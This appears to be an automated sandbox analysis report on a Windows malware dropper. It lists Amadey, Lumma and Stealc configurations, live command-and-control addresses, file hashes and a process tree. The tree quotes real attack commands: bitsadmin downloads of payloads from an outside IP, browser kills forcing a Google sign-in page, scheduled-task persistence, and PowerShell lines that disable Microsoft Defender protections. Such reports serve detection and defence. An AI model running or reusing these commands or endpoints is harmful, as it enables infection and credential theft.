Analysis

  • max time kernel
    111s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-11-2024 00:11

General

  • Target

    BWDAN_file.exe

  • Size

    1.8MB

  • MD5

    b3778394044fb4bd48df1134fc3768c9

  • SHA1

    dcb60c2520fc805a10ac2db5c768b0532adda42b

  • SHA256

    b0ebf31b0ded84953d0b471f380c0743832dc360eed391b5195c997d99f34d85

  • SHA512

    36987385f0405da6fbf4d22517c34b5bef9dd8d798401f55735dbbb1c6b38f0d3fe3c7628e74218125903260e876a4ce68b6f79f5d915b4c4c7eb417b806371f

  • SSDEEP

    49152:fbf1+D8s1ITM7ZzPqEdb9fyu7TwzLX8rkuDif4BTsU:fbsD8s1Waqw97TwXMrkuOf4B1

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://preside-comforter.sbs

https://savvy-steereo.sbs

https://copper-replace.sbs

https://record-envyp.sbs

https://slam-whipp.sbs

https://wrench-creter.sbs

https://looky-marked.sbs

https://plastic-mitten.sbs

https://tail-cease.cyou

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://tail-cease.cyou/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 32 IoCs
  • Suspicious use of SendNotifyMessage 28 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\BWDAN_file.exe
    "C:\Users\Admin\AppData\Local\Temp\BWDAN_file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4784
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:668
      • C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe
        "C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4176
      • C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe
        "C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4152
        • C:\Windows\SysWOW64\ping.exe
          ping -n 1 8.8.8.8
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4100
        • C:\Windows\SysWOW64\bitsadmin.exe
          bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
          4⤵
          • Download via BitsAdmin
          • System Location Discovery: System Language Discovery
          PID:5052
        • C:\Windows\SysWOW64\bitsadmin.exe
          bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"
          4⤵
          • Download via BitsAdmin
          • System Location Discovery: System Language Discovery
          PID:3920
      • C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:644
        • C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe
          "C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"
          4⤵
          • Executes dropped EXE
          PID:1236
        • C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe
          "C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3220
      • C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe
        "C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"
        3⤵
        • Executes dropped EXE
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4300
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\Click2Profit.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1009928001\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1732598447 " AI_EUIMSI=""
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          PID:216
      • C:\Users\Admin\AppData\Local\Temp\1010059001\874c45f7a1.exe
        "C:\Users\Admin\AppData\Local\Temp\1010059001\874c45f7a1.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3620
      • C:\Users\Admin\AppData\Local\Temp\1010060001\3e29ac4e6c.exe
        "C:\Users\Admin\AppData\Local\Temp\1010060001\3e29ac4e6c.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4260
      • C:\Users\Admin\AppData\Local\Temp\1010061001\4f5b1a7e7e.exe
        "C:\Users\Admin\AppData\Local\Temp\1010061001\4f5b1a7e7e.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3852
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:2192
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:4188
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:2608
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:924
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          PID:1892
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:3144
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:1200
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1928 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d3250ae-17f6-472f-a43b-1d9c06c2be8b} 1200 "\\.\pipe\gecko-crash-server-pipe.1200" gpu
                6⤵
                  PID:1468
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2420 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7af5a08-0352-4a77-918b-37d16fccd4c3} 1200 "\\.\pipe\gecko-crash-server-pipe.1200" socket
                  6⤵
                    PID:2956
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3288 -childID 1 -isForBrowser -prefsHandle 3296 -prefMapHandle 1564 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2938fc0c-b2ae-4738-8f71-65d331524646} 1200 "\\.\pipe\gecko-crash-server-pipe.1200" tab
                    6⤵
                      PID:1572
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3124 -childID 2 -isForBrowser -prefsHandle 3768 -prefMapHandle 3420 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1b2451a-c521-459d-a867-a922d33d6906} 1200 "\\.\pipe\gecko-crash-server-pipe.1200" tab
                      6⤵
                        PID:3656
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4536 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4400 -prefMapHandle 2828 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e14c4158-5648-4c5c-bbbc-828577da4a32} 1200 "\\.\pipe\gecko-crash-server-pipe.1200" utility
                        6⤵
                        • Checks processor information in registry
                        PID:5712
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5272 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 5260 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98d0ec2f-b1f4-4932-a35e-770f5db90a4a} 1200 "\\.\pipe\gecko-crash-server-pipe.1200" tab
                        6⤵
                          PID:3644
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5412 -childID 4 -isForBrowser -prefsHandle 5420 -prefMapHandle 5424 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6756db0-45ad-47ab-af5e-98b9c1399742} 1200 "\\.\pipe\gecko-crash-server-pipe.1200" tab
                          6⤵
                            PID:1836
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5700 -childID 5 -isForBrowser -prefsHandle 5692 -prefMapHandle 5688 -prefsLen 26998 -prefMapSize 244658 -jsInitHandle 920 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bdb5ed6-9eed-4434-9a14-d862f93ffe2b} 1200 "\\.\pipe\gecko-crash-server-pipe.1200" tab
                            6⤵
                              PID:5128
                      • C:\Users\Admin\AppData\Local\Temp\1010062001\68dd47c68d.exe
                        "C:\Users\Admin\AppData\Local\Temp\1010062001\68dd47c68d.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • System Location Discovery: System Language Discovery
                        PID:5876
                      • C:\Users\Admin\AppData\Local\Temp\1010063001\5873122702.exe
                        "C:\Users\Admin\AppData\Local\Temp\1010063001\5873122702.exe"
                        3⤵
                          PID:3184
                        • C:\Users\Admin\AppData\Local\Temp\1010064001\718598a0a4.exe
                          "C:\Users\Admin\AppData\Local\Temp\1010064001\718598a0a4.exe"
                          3⤵
                            PID:6084
                          • C:\Users\Admin\AppData\Local\Temp\1010065001\c7895e873a.exe
                            "C:\Users\Admin\AppData\Local\Temp\1010065001\c7895e873a.exe"
                            3⤵
                              PID:4300
                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          1⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2904
                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                          1⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3332
                        • C:\Windows\system32\msiexec.exe
                          C:\Windows\system32\msiexec.exe /V
                          1⤵
                          • Enumerates connected drives
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3256
                          • C:\Windows\syswow64\MsiExec.exe
                            C:\Windows\syswow64\MsiExec.exe -Embedding DAFE91D2AC72439892F3416FB8D96ED2 C
                            2⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:3480
                          • C:\Windows\system32\srtasks.exe
                            C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                            2⤵
                              PID:5500
                            • C:\Windows\syswow64\MsiExec.exe
                              C:\Windows\syswow64\MsiExec.exe -Embedding 7859441ED6A544DBDAE3B3ADEFBE7035
                              2⤵
                                PID:5232
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssAD71.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiAD6D.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrAD6E.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrAD6F.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:5984
                              • C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe
                                "C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe"
                                2⤵
                                  PID:6024
                                • C:\Windows\Installer\MSIC080.tmp
                                  "C:\Windows\Installer\MSIC080.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Roaming\Installer\Setup\task.bat"
                                  2⤵
                                  • Access Token Manipulation: Create Process with Token
                                  PID:6044
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C ""C:\Users\Admin\AppData\Roaming\Installer\Setup\task.bat" "
                                    3⤵
                                      PID:5196
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks.exe /create /tn "SystemCare" /tr "C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe" /sc onstart /delay 0005:00
                                        4⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:5220
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -Command "Start-Process powershell -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionPath C:\Users\$env:username\AppData\Local; Set-MpPreference -MAPSReporting Disabled; Set-MpPreference -SubmitSamplesConsent NeverSend\"' -NoNewWindow"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:4432
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath C:\Users\$env:username\AppData\Local; Set-MpPreference -MAPSReporting Disabled; Set-MpPreference -SubmitSamplesConsent NeverSend"
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          PID:1456
                                • C:\Windows\system32\vssvc.exe
                                  C:\Windows\system32\vssvc.exe
                                  1⤵
                                  • Checks SCSI registry key(s)
                                  PID:4980

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Config.Msi\e59a002.rbs

                                  Filesize

                                  16KB

                                  MD5

                                  ee475955d8c73658eebbb3db1a714783

                                  SHA1

                                  59e8b8f5775b529058ef7371f97e5e82798b4c88

                                  SHA256

                                  f2844e6f6c5edb366cca6a90c12276fbd664874c8d9eaf9d15539c2118f6e50e

                                  SHA512

                                  f384566eeefd3c8fb9a41dfdd23036b886f0bc44fd0783880d5685d75d98b0f4926d87d35ad4027c80599e40d08b3622eda3c0a5e2ebc5b1b2ad1a96e99c58af

                                • C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe

                                  Filesize

                                  587KB

                                  MD5

                                  aee263964001bcc56ca51ab75c437f05

                                  SHA1

                                  9a6b4fd812167bef70e2b3232294bfc942ecdb22

                                  SHA256

                                  5f6ef36e4fd0765171c68c007e10ab796119c8e0ec37301fe360b77e4fdc8d90

                                  SHA512

                                  66e27c6b12d7de386d93b9b7ef3191d19d889996c7367b13acb76aabb86997684e6cc49456149d4e60211d45006307af819f8db47fae29ad7d116009916b012f

                                • C:\Users\Admin\AppData\Local\Corporation\data\debug.txt

                                  Filesize

                                  402B

                                  MD5

                                  4f60a9695d18827774d73124b7750eab

                                  SHA1

                                  289cdc9796f3531a4c253e5d05087b086808390e

                                  SHA256

                                  b9438b65d084d47c5856f43ca6ca72904ef11dc9267fe7337320bf6acd51d860

                                  SHA512

                                  27acf07584910029848139a9a1415e4e81456856f0d7ff3990acd68e356b401e6d272993f23bee16bdfcf3f8594a09bb79a25d3ec2056aad5bd53bc86d97a1e3

                                • C:\Users\Admin\AppData\Local\Corporation\data\debug.txt

                                  Filesize

                                  1KB

                                  MD5

                                  84515e17bb4cf9296922d0003c6dfc0d

                                  SHA1

                                  c8c1da5618ab70867af09dd3000cc61e8e221ab5

                                  SHA256

                                  8acc6267d1e8ef4686a1f46975e568f1c33298fef1c9e3b2764ff29ae33b35b8

                                  SHA512

                                  fe8dc8c8180d8f1f16e4550bc86e6617621931beaf7e0af7518ae7b9723b032ac57b10a6d0687f9fa8dbcb0c1bdd0e7a191acef3d279f3c1408c7886d78cc47b

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6IJLDY7V\download[1].htm

                                  Filesize

                                  1B

                                  MD5

                                  cfcd208495d565ef66e7dff9f98764da

                                  SHA1

                                  b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                  SHA256

                                  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                  SHA512

                                  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json.tmp

                                  Filesize

                                  21KB

                                  MD5

                                  c28989345dacbf47b4f249447ee5ae18

                                  SHA1

                                  2d623393d956a47a83d01a89e01266ba99b97ee3

                                  SHA256

                                  5c29a0b3223f8eaaa4a6302df796e7d3144f5d638a50bdf9f8c3381f84132ee6

                                  SHA512

                                  7f1330cf63bf68131185f81f162aac4800a7e6ad841cd9cecad96a1b8419271f3a1b6e39dc606d58e1f7d55dca7a8040c8e89816650c104791469b11c69c74da

                                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\cache2\entries\39DB9E847E680B765D7B04FCCE6BF5BC0225F878

                                  Filesize

                                  13KB

                                  MD5

                                  4f25979b72aee8654c9819383b149b8a

                                  SHA1

                                  c30f0795e9c9adaa0d754b340312904bdd4086b1

                                  SHA256

                                  b94deba6ec0206df58e3a34dab7e8e88bb35243d015cc253d2b58987714e9cb9

                                  SHA512

                                  0ee55e70413196d8eaf1fb4670092fec2e56d9069a570584fa6a154ab23c3b6a32dd986d01025e3c3445f060a3598974d0c97d07c40a440a65334b5ba24dd8db

                                • C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe

                                  Filesize

                                  1.6MB

                                  MD5

                                  18cf1b1667f8ca98abcd5e5dceb462e9

                                  SHA1

                                  62cf7112464e89b9fa725257fb19412db52edafd

                                  SHA256

                                  56a8033f43692f54e008b7a631c027682e1cabd4450f9f45ce10d4fc10f3fcf3

                                  SHA512

                                  b66be8acac0152ae3a9a658fde23f3f3ad026e3f8099df5c8771eb1524e8baa2ba9f88b9577a85493f0e241089798e40a158325cb606345c94d979e0088443d0

                                • C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe

                                  Filesize

                                  42KB

                                  MD5

                                  56944be08ed3307c498123514956095b

                                  SHA1

                                  53ffb50051da62f2c2cee97fe048a1441e95a812

                                  SHA256

                                  a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181

                                  SHA512

                                  aa196a1a1e44c3fde974bbf8a031e6943a474d16d5a956b205d283ee5be53e110dba52817f7f2782e7ecc8783fea77f9c34613f99fb81fe09d2bea8b2f91bc13

                                • C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe

                                  Filesize

                                  984KB

                                  MD5

                                  a55d149ef6d095d1499d0668459c236f

                                  SHA1

                                  f29aae537412267b0ad08a727ccf3a3010eea72b

                                  SHA256

                                  c4a5fdd606768f6f69aa9e6cad874296c8e1e85f88b17f12b4ecab2c247c54ce

                                  SHA512

                                  2c89c0b92afaf69e7c1a63e44ebbe41c7919ad74abd2b70a6077faa6a4ca24bc6103ddf584633cd177a858550c667b430668095c3dc9abb27fefa38940d4370b

                                • C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe

                                  Filesize

                                  17.7MB

                                  MD5

                                  5f602a88eb5e8abb43c9035585f8dbef

                                  SHA1

                                  b17a1bc278f0c7ccc8da2f8c885f449774710e4c

                                  SHA256

                                  95b586a973d1b82e0ab59cd1127466d11fdf7fd352e10b52daa3e9a43d02d1f0

                                  SHA512

                                  9575baf06700e8b10e03a20d80f570c6c9cf0ee09ad7589d58f096c7a73a5c17d31856b73120f9e38cd2ba2e13f1082b206ccbee3b070dd9b70b4e6460df5fff

                                • C:\Users\Admin\AppData\Local\Temp\1010059001\874c45f7a1.exe

                                  Filesize

                                  1.8MB

                                  MD5

                                  be160ffe8bee79804ef0fded48162450

                                  SHA1

                                  33ce735ed76c739abb8baf60f4d377f55e2e9752

                                  SHA256

                                  d73a27f150378fb9554c0d0aa903ff7b80991d70d676220c7d015dd69690fa4d

                                  SHA512

                                  6ba89e89a04d77e363e80e5d7bf0e0334d9d1c789a2d74753a1a0841f4159a6e788e4de0d441ceb2f29ff75402c4f788bb60281d7cdb82499d05460f3d3dc303

                                • C:\Users\Admin\AppData\Local\Temp\1010060001\3e29ac4e6c.exe

                                  Filesize

                                  1.7MB

                                  MD5

                                  37636f97d17a353df808d9db91e75bb6

                                  SHA1

                                  b5553325110e3099dccdb14656550331406224c5

                                  SHA256

                                  496357be019ded9cae676d6a12a9a2b83402c35db4ce8fe1cff0df05f395baa2

                                  SHA512

                                  cb02dcf3e64c368b26897065418d18facec44cb335151492017d560b47549aa99199f52e8e2562abbc5c32ffc5b0f284cab1c74cded60ac516566aeca9e23eec

                                • C:\Users\Admin\AppData\Local\Temp\1010061001\4f5b1a7e7e.exe

                                  Filesize

                                  901KB

                                  MD5

                                  a28a278d03c370b06897d3197b8dd2c3

                                  SHA1

                                  373d96ce3d66930f9365e76fcfe09661aafed850

                                  SHA256

                                  6ae49ce07044cf9d3ab5662409332891670ee241aaa3ac265b5ff9b42440b834

                                  SHA512

                                  9746a99bef609d1ef5a5e6ae81a46d6f74bcc2256a33b39d9627f57476ee061aef1e7fc7f9c934b179430c7d9d6ddf6b293522d1ee7c22d8841c92dcabcbe64c

                                • C:\Users\Admin\AppData\Local\Temp\1010062001\68dd47c68d.exe

                                  Filesize

                                  2.7MB

                                  MD5

                                  5e6a5679a4ae9a5a634ffda70a6b26e8

                                  SHA1

                                  5edcc20ae91fbf3ff5d9f8492b5de415621cd852

                                  SHA256

                                  18d26db7f0947e666dbc3e65b165ad0ce621f6269c637a6eb5a258f816686dfc

                                  SHA512

                                  3ac74beaa1b45432e209b4dbef2303628f4257344731940dd822a88e470a22524b536bca574778ac6399b0a52312e109316dbf5593b73a3483d7fa86f59f70d5

                                • C:\Users\Admin\AppData\Local\Temp\1010063001\5873122702.exe

                                  Filesize

                                  4.3MB

                                  MD5

                                  6f7dd1b1c3c49f9480f2ddb454831557

                                  SHA1

                                  9b785e293e2936e83c061ca93d544fbbadc96946

                                  SHA256

                                  fefa5a798486db3831161eb4beaa9fac76d663e5f912ccf55bc0962e33691926

                                  SHA512

